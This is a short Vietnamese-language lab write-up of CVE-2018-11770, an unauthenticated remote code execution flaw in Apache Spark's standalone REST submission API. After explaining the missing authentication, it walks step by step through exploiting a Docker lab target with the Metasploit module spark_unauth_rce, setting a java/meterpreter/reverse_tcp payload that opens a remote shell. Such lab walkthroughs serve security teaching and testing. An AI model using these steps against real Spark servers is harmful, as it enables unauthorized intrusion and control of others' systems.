CVE-2018-11770
Description
CVE-2018-11770 được phát hiện bởi nhà nghiên cứu Trung Quốc Fengwei Zhang (Alibaba Cloud Security Team), API REST CreateSubmissionRequest
có thể bị khai thác khi ở chế độ standalone
cho phép hacker gửi mã độc và thực thi mã từ xa.
Nguyên nhân xảy ra
Từ phiên bản 1.3.0 trở đi, Spark's standalone
master cung cấp một REST API để gửi công việc từ xa, bên cạnh việc sử dụng spark-submit. Trong chế độ standalone
, thuộc tính cấu hình spark.authenticate.secret
thiết lập một khóa bí mật chung để xác thực các yêu cầu gửi công việc thông qua spark-submit
. Tuy nhiên, REST API không sử dụng cơ chế xác thực này hoặc bất kỳ cơ chế xác thực nào khác. Trong trường hợp này, bất kỳ người dùng nào cũng sẽ có thể chạy một chương trình trình điều khiển (có thể được viết bằng java, python,…) mà không cần xác thực.
Goal
Khai thác lỗ hổng CVE-2018-11770
sử dụng framework metasploit
, sau đó tiến hành RCE.
Exploitation
Bước 1: Khởi chạy máy ảo Docker bằng câu lệnh
docker-compose up
Bước 2: Tiến hành khai thác bằng metasploit
framework
Bước 3: Sử dụng module spark_unauth_rce
bằng câu lệnh use exploit/linux/http/spark_unauth_rce
.
Bước 4: Sử dụng câu lệnh show options
để xem các cấu hình:
Bước 5: Tại đây chúng ta sẽ thiết lập IP cho RHOST
, LHOST
và tìm những payload phù hợp để tấn công vào máy mục tiêu:
set RHOSTS 192.168.1.39
set RPORT 6066
set LHOST 192.168.1.39
set LPORT 5555
set payload java/meterpreter/reverse_tcp
Bước 6: Các thiết lập cho việc khai thác máy mục tiêu bằng metasploit
đã hoàn thành thực hiện câu lệnh exploit
để khai thác.
Bước 7: Khai thác thành công
Bước 8: Submit-job
thành công:
Video demo